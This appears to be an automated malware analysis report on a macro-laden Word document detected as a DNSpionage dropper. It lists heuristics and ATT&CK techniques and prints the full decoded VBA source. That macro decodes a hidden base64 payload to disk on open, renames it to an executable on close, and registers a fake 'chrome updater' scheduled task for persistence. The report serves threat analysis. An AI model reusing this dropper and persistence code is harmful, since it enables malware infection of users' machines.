MALICIOUS
238
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1140 Deobfuscate/Decode Files or Information
T1071.001 Web Protocols
T1204.002 Malicious File
The sample contains a VBA macro that executes upon opening the document, indicated by the Document_Open heuristic. This macro attempts to create a directory and save a file named 'svshost_serv.doc' to it, which is likely a disguised executable. The script also attempts to decode base64 content and save it as an executable. The presence of heap spray and NOP sled heuristics further suggests shellcode execution, common in droppers.
Heuristics 9
-
ClamAV: Xls.Dropper.DNSpionage-6773417-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.DNSpionage-6773417-0
-
Heap-spray pattern detected high SC_HEAP_SPRAYRepeated 0x41 (A) bytes found
Disassembly
Attempted x86 opcode disassembly0000F1CC 41 inc ecx 0000F1CD 41 inc ecx 0000F1CE 41 inc ecx 0000F1CF 41 inc ecx 0000F1D0 41 inc ecx 0000F1D1 41 inc ecx 0000F1D2 41 inc ecx 0000F1D3 41 inc ecx 0000F1D4 41 inc ecx 0000F1D5 41 inc ecx 0000F1D6 41 inc ecx 0000F1D7 41 inc ecx 0000F1D8 41 inc ecx 0000F1D9 41 inc ecx 0000F1DA 41 inc ecx 0000F1DB 41 inc ecx 0000F1DC 41 inc ecx 0000F1DD 41 inc ecx 0000F1DE 41 inc ecx 0000F1DF 41 inc ecx 0000F1E0 41 inc ecx 0000F1E1 41 inc ecx 0000F1E2 41 inc ecx 0000F1E3 41 inc ecx 0000F1E4 41 inc ecx 0000F1E5 41 inc ecx 0000F1E6 41 inc ecx 0000F1E7 41 inc ecx 0000F1E8 41 inc ecx 0000F1E9 41 inc ecx 0000F1EA 41 inc ecx 0000F1EB 41 inc ecx 0000F1EC 41 inc ecx 0000F1ED 41 inc ecx 0000F1EE 41 inc ecx 0000F1EF 41 inc ecx 0000F1F0 41 inc ecx 0000F1F1 41 inc ecx 0000F1F2 41 inc ecx 0000F1F3 41 inc ecx 0000F1F4 41 inc ecx 0000F1F5 41 inc ecx 0000F1F6 41 inc ecx 0000F1F7 41 inc ecx 0000F1F8 41 inc ecx 0000F1F9 41 inc ecx 0000F1FA 41 inc ecx 0000F1FB 41 inc ecx 0000F1FC 41 inc ecx 0000F1FD 41 inc ecx 0000F1FE 41 inc ecx 0000F1FF 41 inc ecx 0000F200 41 inc ecx 0000F201 41 inc ecx 0000F202 41 inc ecx 0000F203 41 inc ecx 0000F204 41 inc ecx 0000F205 41 inc ecx 0000F206 41 inc ecx 0000F207 41 inc ecx 0000F208 41 inc ecx 0000F209 41 inc ecx 0000F20A 41 inc ecx 0000F20B 41 inc ecx 0000F20C 41 inc ecx 0000F20D 41 inc ecx 0000F20E 41 inc ecx 0000F20F 41 inc ecx 0000F210 41 inc ecx 0000F211 41 inc ecx 0000F212 41 inc ecx 0000F213 41 inc ecx 0000F214 41 inc ecx 0000F215 41 inc ecx 0000F216 41 inc ecx 0000F217 41 inc ecx 0000F218 41 inc ecx 0000F219 41 inc ecx 0000F21A 41 inc ecx 0000F21B 41 inc ecx 0000F21C 41 inc ecx 0000F21D 41 inc ecx 0000F21E 41 inc ecx 0000F21F 41 inc ecx 0000F220 41 inc ecx 0000F221 41 inc ecx 0000F222 41 inc ecx 0000F223 41 inc ecx 0000F224 41 inc ecx 0000F225 41 inc ecx 0000F226 41 inc ecx 0000F227 41 inc ecx 0000F228 41 inc ecx 0000F229 41 inc ecx 0000F22A 41 inc ecx 0000F22B 41 inc ecx
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
dinner_add = Environ("userp" & "rofile") & "\.or" & "acleServices\svshost_serv." & "e" & "x" & "e" Set objFSO = CreateObject("Scripting.FileSystemObject") If objFSO.FileExists(dinner_add) Then -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Sub Document_Open() Dim just_task As Boolean -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
just_task = False dinner_add = Environ("userp" & "rofile") & "\.or" & "acleServices\svshost_serv." & "e" & "x" & "e" Set objFSO = CreateObject("Scripting.FileSystemObject") -
NOP-equivalent sled detected medium SC_NOP_EQUIV_SLEDLong run of 0x41 bytes
Disassembly
Attempted x86 opcode disassembly0000EE2D 41 inc ecx 0000EE2E 41 inc ecx 0000EE2F 41 inc ecx 0000EE30 41 inc ecx 0000EE31 41 inc ecx 0000EE32 41 inc ecx 0000EE33 41 inc ecx 0000EE34 41 inc ecx 0000EE35 41 inc ecx 0000EE36 41 inc ecx 0000EE37 41 inc ecx 0000EE38 41 inc ecx 0000EE39 41 inc ecx 0000EE3A 41 inc ecx 0000EE3B 41 inc ecx 0000EE3C 41 inc ecx 0000EE3D 41 inc ecx 0000EE3E 41 inc ecx 0000EE3F 41 inc ecx 0000EE40 41 inc ecx 0000EE41 41 inc ecx 0000EE42 41 inc ecx 0000EE43 41 inc ecx 0000EE44 41 inc ecx 0000EE45 41 inc ecx 0000EE46 41 inc ecx 0000EE47 41 inc ecx 0000EE48 41 inc ecx 0000EE49 41 inc ecx 0000EE4A 41 inc ecx 0000EE4B 41 inc ecx 0000EE4C 41 inc ecx 0000EE4D 41 inc ecx 0000EE4E 41 inc ecx 0000EE4F 41 inc ecx 0000EE50 41 inc ecx 0000EE51 41 inc ecx 0000EE52 41 inc ecx 0000EE53 41 inc ecx 0000EE54 41 inc ecx 0000EE55 41 inc ecx 0000EE56 41 inc ecx 0000EE57 41 inc ecx 0000EE58 41 inc ecx 0000EE59 41 inc ecx 0000EE5A 41 inc ecx 0000EE5B 41 inc ecx 0000EE5C 45 inc ebp 0000EE5D 41 inc ecx 0000EE5E 45 inc ebp 0000EE5F 41 inc ecx 0000EE60 41 inc ecx 0000EE61 41 inc ecx 0000EE62 3466 xor al, 0x66 0000EE64 7567 jne 0xeecd 0000EE66 3441 xor al, 0x41 0000EE68 7441 je 0xeeab 0000EE6A 6e outsb dx, byte ptr [esi] 0000EE6B 4e dec esi 0000EE6C 49 dec ecx 0000EE6D 626742 bound esp, qword ptr [edi + 0x42] 0000EE70 54 push esp 0000EE71 4d dec ebp 0000EE72 306856 xor byte ptr [eax + 0x56], ch 0000EE75 47 inc edi 0000EE76 6870637942 push 0x42796370 0000EE7B 7763 ja 0xeee0 0000EE7D 6d insd dword ptr es:[edi], dx 0000EE7E 396e63 cmp dword ptr [esi + 0x63], ebp 0000EE81 6d insd dword ptr es:[edi], dx 0000EE82 46 inc esi 0000EE83 7449 je 0xeece 0000EE85 47 inc edi 0000EE86 4e dec esi 0000EE87 68626d3576 push 0x76356d62 0000EE8C 64 .byte 0x64
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6901 bytes |
SHA-256: fd25f106140c087f522d249dcd5cc93252261adba16a22096341d4bd708dc94f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim just_task As Boolean
just_task = False
dinner_add = Environ("userp" & "rofile") & "\.or" & "acleServices\svshost_serv." & "e" & "x" & "e"
Set objFSO = CreateObject("Scripting.FileSystemObject")
If objFSO.FileExists(dinner_add) Then
just_task = True
End If
If just_task = False Then
Dim path As String
path = Environ("userp" & "rofile") & "\.oracleServices"
If Dir(path, vbDirectory) = "" Then
MkDir path
End If
Text = ""
Text = UserForm1.Label1.Caption
Dim winner_add
winner_add = Environ("userp" & "rofile") & "\.oracleServices\svshost_serv." & "d" & "o" & "c"
Dim peacher
Dim DM, EL
If Application.MouseAvailable Then
Set DM = CreateObject("Microsoft.XML" & "DOM")
Set EL = DM.createElement("t" & "mp")
EL.DataType = "bin.bas" & "e64"
EL.Text = Text
peacher = EL.NodeTypedValue
Dim fileNo As Integer
fileNo = FreeFile
Open winner_add For Binary Lock Read Write As #fileNo
Dim beacher() As Byte
beacher = peacher
Put #fileNo, 1, beacher
Close #fileNo
End If
End If
'If ActiveDocument.Sections.Count = 2 Then
'ActiveDocument.Sections.First.Range.Delete
Dim shp As Shape
For Each shp In ActiveDocument.Shapes
shp.Visible = True
Next shp
Dim res As Integer
res = MsgBox("Content Made Available", vbSystemModal + vbInformation, "Microsoft Office")
'End If
End Sub
Function insert_country(insert_string As Variant)
' Insert the string in insert_string after the current search position.
Dim wdApp As Word.Application
Dim oRng As Range
Dim Rows_Written As Long
Set wdApp = Word.Application
Set oRng = wdApp.Selection.Range
With oRng
.Start = .Paragraphs(1).Range.End
.InsertParagraphAfter
.Start = .End
.Text = CStr(insert_string)
.Font.Name = "Times New Roman"
.Font.Bold = True
.Font.Underline = wdUnderlineSingle
.Font.Size = 12
.InsertParagraphAfter
End With
Rows_Written = Rows_Written + 2
End Function
Sub Document_Close()
If Application.MouseAvailable Then
Set objFSO = CreateObject("Scripting.FileSystemObject")
Dim winner_add
winner_add = Environ("userp" & "rofile") & "\.oracleServices\svshost_serv." & "d" & "o" & "c"
dinner_add = Environ("userp" & "rofile") & "\.oracleServices\svshost_serv." & "e" & "x" & "e"
If objFSO.FileExists(winner_add) And Not (objFSO.FileExists(dinner_add)) Then
Name winner_add As dinner_add
End If
Const e0 = "sc"
Const e1 = "he"
Const e2 = "ule.ser"
' Create the TaskService object.
Set service = CreateObject(e0 & e1 & "d" & e2 & "vice")
Call service.Connect
Dim rootFolder
Set rootFolder = service.GetFolder("\")
' The taskDefinition variable is the TaskDefinition object.
Dim taskDefinition
' The flags parameter is 0 because it is not supported.
Set taskDefinition = service.NewTask(0)
' Define information about the task.
Dim regInfo
Set regInfo = taskDefinition.RegistrationInfo
regInfo.Description = "chromium updater v 37.5.0"
regInfo.Author = "Google Inc."
' Set the principal for the task
Dim principal
Set principal = taskDefinition.principal
' Set the logon type to interactive logon
principal.LogonType = 3
' Set the task setting info for the Task Scheduler by
' creating a TaskSettings object.
With taskDefinition.settings
.Enabled = True
.runonlyifidle = False
.disallowstartifonbatteries = False
.multipleinstances = 0
.allowdemandstart = True
.StartWhenAvailable = True
.ExecutionTimeLimit = "P20D"
End With
' Create a time-based trigger.
With taskDefinition
Set objTaskTriggers = .triggers
Set objTaskTrigger = objTaskTriggers.Create(1)
With objTaskTrigger
.Enabled = True
.ID = "" & counter & ""
' Time Format YYYY-MM-DDTHH:MM:SS or use ConvertTime Format
'.StartBoundary = "2013-07-01T08:08:00"
'.EndBoundary = "2013-07-01T08:08:00"
.StartBoundary = ConvertTime(DateAdd("h", 0, Now()))
With .Repetition
' Format For Days = P#D where # is the number of days
' Format for Time = PT#[HMS] Where # is the duration and H for hours, M for minutes, S for seconds
'.Duration = "PINF"
.Interval = "PT1M"
.StopAtDurationEnd = False
End With 'objTaskRepitition
End With
End With
' Add an action to the task to run
Const what_to_do = 0
Dim Action
Set Action = taskDefinition.Actions.Create(what_to_do)
winner_do = """" & Environ("userp" & "rofile") & "\.oracleServices\svshost_serv." & "e" & "x" & "e"""
'winner_do = """C:\windows\system32\calc.exe"""
Action.path = winner_do
' Register (create) the task.
Call rootFolder.RegisterTaskDefinition("chrome updater", taskDefinition, 6, , , 3)
End If
End Sub
Function ConvertTime(DateTimeValue)
' Convert a DateTime value to the format needed by
' task scheduler
' YYYY-MM-DDTHH:MM:SS
Dim strTime
strTime = Year(DateTimeValue) & "-"
strTime = strTime & Right("0" & Month(DateTimeValue), 2) & "-"
strTime = strTime & Right("0" & Day(DateTimeValue), 2) & "T"
strTime = strTime & Right("0" & Hour(DateTimeValue), 2) & ":"
strTime = strTime & Right("0" & Minute(DateTimeValue), 2) & ":"
strTime = strTime & Right("0" & Day(DateTimeValue), 2)
ConvertTime = strTime
End Function
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{59344D6F-A95F-4083-A5BE-E5597601B819}{D3772A25-DCD2-4486-A88C-185C761A2B79}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.